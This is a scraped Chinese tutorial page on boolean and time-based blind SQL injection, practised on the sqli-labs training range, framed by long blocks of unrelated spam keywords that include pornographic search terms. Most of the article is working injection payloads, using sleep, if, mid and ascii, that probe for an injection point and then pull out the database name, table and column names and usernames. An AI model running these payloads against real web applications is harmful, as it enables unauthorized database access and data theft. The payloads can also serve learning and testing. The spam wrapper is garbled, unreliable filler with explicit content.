日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区

您的位置:首頁技術(shù)文章
文章詳情頁

SQL bool盲注和時(shí)間盲注詳解

瀏覽:362日期:2023-03-06 14:25:14
目錄
  • 一、bool盲注和時(shí)間盲注常用函數(shù)
  • 二、bool盲注和時(shí)間盲注payload
    • 1、SQL注入點(diǎn)探測
    • 2、猜解數(shù)據(jù)庫名
    • 3、猜解表名
    • 4、猜解字段名
    • 5、猜解數(shù)據(jù)

今天繼續(xù)給大家介紹Linux運(yùn)維相關(guān)知識,本文主要內(nèi)容是SQL bool盲注和時(shí)間盲注。

免責(zé)聲明:
本文所介紹的內(nèi)容僅做學(xué)習(xí)交流使用,嚴(yán)禁利用文中技術(shù)進(jìn)行非法行為,否則造成一切嚴(yán)重后果自負(fù)!
再次強(qiáng)調(diào):嚴(yán)禁對未授權(quán)設(shè)備進(jìn)行滲透測試!

一、bool盲注和時(shí)間盲注常用函數(shù)

1、休眠函數(shù)
sleep()是SQL語句中用于休眠的函數(shù),時(shí)間盲注中常用,sleep(x)可以讓程序休眠x秒。
2、字符串截取函數(shù)
字符串截取函數(shù)是bool盲注和時(shí)間盲注中都需要使用的函數(shù)。常用的字符串截取函數(shù)有mid()、substr()、left()。
mid()函數(shù)格式為:

mid(【目標(biāo)字段】,【開始的位置】,【截取長度】)

其中,開始的位置默認(rèn)從1開始。
substr()函數(shù)的用法與mid相似,left函數(shù)則默認(rèn)從字段的最左邊開始截取,其格式為:

left(【目標(biāo)字段】,【截取長度】)

表示從目標(biāo)字段的左邊開始截取指定長度的字符。
3、字符串長度函數(shù)
字符串長度函數(shù)length()會(huì)應(yīng)用在SQL bool盲注和時(shí)間盲注中,length()函數(shù)可以反饋目標(biāo)字符串的長度。
4、ascii碼轉(zhuǎn)換函數(shù)
ascii碼轉(zhuǎn)換函數(shù)可以將一個(gè)字符轉(zhuǎn)換成ascii碼,在SQL基于時(shí)間的盲注和基于bool的盲注中,ascii碼轉(zhuǎn)換函數(shù)可以將一個(gè)字符轉(zhuǎn)換成其ascii碼值。常用的ascii碼轉(zhuǎn)換函數(shù)為ascii()、ord()。
5、條件判斷函數(shù)
條件判斷函數(shù)if是SQL時(shí)間盲注中的必用函數(shù),可以利用if函數(shù)來根據(jù)條件來反饋不同的結(jié)果。
if函數(shù)格式如下所示:

if(【條件】,【值1】,【值2】)

當(dāng)條件成立時(shí),if函數(shù)返回值1,當(dāng)條件不成立時(shí),if函數(shù)返回值2.

二、bool盲注和時(shí)間盲注payload

1、SQL注入點(diǎn)探測

我們使用sqli_lab的靶場,對基于bool的盲注和基于時(shí)間的盲注進(jìn)行講解,在sqli_lab靶場中,基于bool的盲注是第8關(guān),基于時(shí)間的盲注是第9關(guān),頁面如下所示:

對于bool類型的盲注,我們可以通過執(zhí)行以下payload來探測是否存在注入點(diǎn):

id=1"and 1=2#

如果顯示異常,那么就說明and后面的內(nèi)容被成功執(zhí)行,因此可能存在bool類型的SQL注入。
對于時(shí)間類型的盲注,我們可以通過執(zhí)行以下payload來探測是否存在注入點(diǎn):

id=1"and sleep(10)#

如果網(wǎng)頁反應(yīng)時(shí)間出現(xiàn)了明顯延遲,就說明存在基于時(shí)間的SQL注入。

2、猜解數(shù)據(jù)庫名

bool類型的盲注猜解數(shù)據(jù)庫長度payload如下所示:

id=1"and length(database())>10#

時(shí)間類型的盲注猜解數(shù)據(jù)庫長度payload如下所示:

id=1"and sleep(if(length(database())>10,10,1))>10#

bool類型的盲注猜解數(shù)據(jù)庫名稱payload如下所示:

id=1"and ascii(mid(database(),1,1))>115#

時(shí)間類型的盲注猜解數(shù)據(jù)庫名稱payload如下所示:

id=1"and sleep(if(ascii(mid(database(),1,1))>115,10,1))#

上述四個(gè)payload,length函數(shù)用于反饋查詢結(jié)果的長度,mid函數(shù)用于截取查詢結(jié)果的指定字符,ascii函數(shù)用于將其轉(zhuǎn)換為ascii碼的形式,if函數(shù)中第一個(gè)參數(shù)為一個(gè)判斷表達(dá)式,本質(zhì)上是bool類型盲注的核心,后面的10和1分別為表達(dá)式成立或者不成立條件下的返回值,該返回值為sleep函數(shù)的輸入,以此就可以控制網(wǎng)頁反應(yīng)的時(shí)間。

3、猜解表名

bool類型的盲注表名個(gè)數(shù)猜解payload如下所示:

id=1"and (select count(*) from information_schema.tables where table_schema=database())>2#

時(shí)間類型的盲注表名個(gè)數(shù)猜解payload如下所示:

id=1"and sleep(if((select count(*) from information_schema.tables where table_schema=database())>2,10,1))#

bool類型的盲注表名猜解payload如下所示:

id=1"and ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100#

時(shí)間類型的盲注表名猜解payload如下所示:

id=1"and sleep(if((ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100),10,1))#

在上述4個(gè)payload中,其原理與之前介紹的相似,但是是使用limit函數(shù)來不斷的控制反饋的變量。

4、猜解字段名

bool類型的盲注字段名個(gè)數(shù)猜解payload如下所示:

id=1"and (select count(*) from information_schema.columns where table_name="users"and table_schema=database())>1#

時(shí)間類型的盲注字段名個(gè)數(shù)猜解payload如下所示:

id=1"and sleep(if((select count(*) from information_schema.columns where table_name="users"and table_schema=database())>1,10,1))#

bool類型的盲注字段名個(gè)數(shù)猜解payload如下所示:

id=1"and ascii(mid((select% column_name from information_schema.columns where%20table_name="users"and table_schema=database() limit 0,1),1,1))>1000#

時(shí)間類型的盲注字段名個(gè)數(shù)猜解payload如下所示:

id=1"and sleep(if(ascii(mid((select% column_name from information_schema.columns where%20table_name="users"and table_schema=database() limit 0,1),1,1))>1000,10,1))#

其原理與之前類似。

5、猜解數(shù)據(jù)

bool類型的盲注數(shù)據(jù)長度猜解payload如下所示:

id=1"and (select count(*) from users)>1#

時(shí)間類型的盲注數(shù)據(jù)長度猜解payload如下所示:

id=1"and sleep(if((select count(*) from users)>1,10,1))#

bool類型的盲注數(shù)據(jù)猜解payload如下所示:

id=1"and ascii(mid((select username from users limit 0,1),1,1))>1#

時(shí)間類型的盲注數(shù)據(jù)猜解payload如下所示:

id=1"and sleep(if(ascii(mid((select username from users limit 0,1),1,1))>1,10,1))#

到此這篇關(guān)于SQL bool盲注和時(shí)間盲注詳解的文章就介紹到這了,更多相關(guān)SQL bool盲注和時(shí)間盲注內(nèi)容請搜索以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持!

標(biāo)簽: MsSQL
日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区
日本不卡一二三区黄网| 免播放器亚洲| 国精品产品一区| 精品午夜av| 国产aⅴ精品一区二区四区| 精品一区二区三区四区五区| 精品久久久久中文字幕小说| 国产一区国产二区国产三区| a天堂资源在线| 国产一区二区久久久久| 国产精品国产一区| 日韩欧美看国产| 女主播福利一区| 久久最新视频| 欧美亚洲三区| 国产精品白丝一区二区三区| 精品久久久久中文字幕小说| 另类中文字幕国产精品| 欧美不卡在线| 一区二区国产在线观看| 欧美一级全黄| 欧美日中文字幕| 噜噜噜躁狠狠躁狠狠精品视频 | 国产一区二区亚洲| 日韩在线二区| 久久av在线| 日韩二区三区四区| 精品国产乱码久久久久久樱花| 日韩在线观看| 亚洲视频国产精品| 欧美激情麻豆| 国产字幕视频一区二区| 午夜久久av| 精品国产午夜| 亚洲天堂久久| 欧美资源在线| 精品国产一区二区三区噜噜噜| 国内亚洲精品| 欧美久久一区二区三区| 日韩av首页| 日韩三级久久| 神马日本精品| 久久精品72免费观看| 久久久国产亚洲精品| 亚洲一区二区三区久久久| 欧美国产精品| 九一国产精品| 日韩欧美四区| 99久久99视频只有精品| 69堂免费精品视频在线播放| 日韩欧美视频专区| 91精品日本| 激情欧美丁香| 国产伦精品一区二区三区视频| 久久精品不卡| 国产女人18毛片水真多18精品| 91精品国产成人观看| 欧美视频精品全部免费观看| 欧美va天堂在线| 久久av国产紧身裤| 亚洲一卡久久| 日韩黄色大片网站| 欧美精品国产白浆久久久久| 亚洲第一区色| 免费一级欧美片在线观看网站| 国产国产精品| 精品丝袜久久| 四虎精品永久免费| 久久要要av| 岛国精品一区| 日本不卡视频在线观看| 亚洲高清激情| 高清精品久久| 国产欧美午夜| 一二三区精品| 亚洲国产专区校园欧美| 国产精品欧美一区二区三区不卡| 老司机久久99久久精品播放免费| 天堂√8在线中文| 国产欧美日韩在线一区二区| 黄色日韩精品| 日韩欧美二区| 精品一区二区三区免费看| 亚洲ww精品| 伊人久久大香线蕉av超碰演员| 国产a久久精品一区二区三区| 国产欧美日韩精品一区二区三区| 蜜桃久久av一区| 五月天综合网站| 久久青草久久| 国产一二在线播放| 捆绑调教美女网站视频一区 | 国产美女久久| 亚洲影视一区二区三区| 樱桃成人精品视频在线播放| 日韩在线精品| 亚洲黄色免费看| 国产在线一区不卡| 美女av一区| 欧美国产三级| 国产日产精品_国产精品毛片| 亚洲深夜福利在线观看| 亚洲视频www| 亚洲欧洲一区| 亚州av乱码久久精品蜜桃| 欧美成人亚洲| 黄页网站一区| 99pao成人国产永久免费视频| 青青青国产精品| 国产精品成人自拍| 青青青国产精品| 日韩精品亚洲专区| 日本亚洲不卡| 亚洲久久一区| 日韩有吗在线观看| 日韩精品一级| 欧美久久久网站| 国产精品亚洲产品| 国产精品一区二区精品| 久久av网址| 四虎成人av| 国产99精品| 在线 亚洲欧美在线综合一区| 91精品1区| 亚洲制服少妇| 亚洲涩涩av| 国产探花一区| 久久中文精品| 日韩伦理一区| 亚洲午夜黄色| 免费不卡在线视频| 婷婷亚洲精品| 国产精品多人| 成年男女免费视频网站不卡| 日韩视频网站在线观看| 一区二区小说| 亚洲综合中文| 国产剧情一区二区在线观看| 国产精品久久久网站| 久久99久久久精品欧美| sm久久捆绑调教精品一区| 久久精品国产99久久| 日韩视频不卡| 婷婷亚洲成人| 欧美日韩日本国产亚洲在线| 精品一区免费| 欧美综合国产| 久久国际精品| 日本一二区不卡| 亚洲精品99| 日韩中文字幕视频网| 欧美视频精品全部免费观看| 精品精品99| 日韩精品永久网址| 国产美女一区| 国产人成精品一区二区三| 国产极品久久久久久久久波多结野| 激情久久一区二区| 国产专区一区| 日韩av中文在线观看| 国产一区二区三区91| 欧美日韩视频| 国产亚洲人成a在线v网站| 五月天av在线| 蜜臀av在线播放一区二区三区| 国产精品久久久一区二区| 日本国产精品| 日本一区二区中文字幕| 久久99久久人婷婷精品综合| 日韩不卡视频在线观看| 亚洲精品少妇| 97国产成人高清在线观看| 亚洲免费婷婷| 久久在线91| 亚洲欧美久久久| 国产精品尤物| 亚洲视频综合| 国产剧情一区二区在线观看| 亚洲va在线| 欧美日韩一区二区三区不卡视频| 91看片一区| 视频一区日韩精品| 日韩国产综合| 午夜精品影视国产一区在线麻豆| 精品伊人久久| 亚洲无线观看| 激情亚洲影院在线观看| 日韩国产精品久久久| 久久香蕉国产| 久久激情五月激情| 亚洲精品小说| 美女视频黄久久| 欧美成人日韩| 久久精品国产99| 一区二区三区四区精品视频| 国产福利电影在线播放| 日韩精品一区二区三区中文在线 | 欧美激情另类| 日韩不卡一二三区| 国产一区亚洲|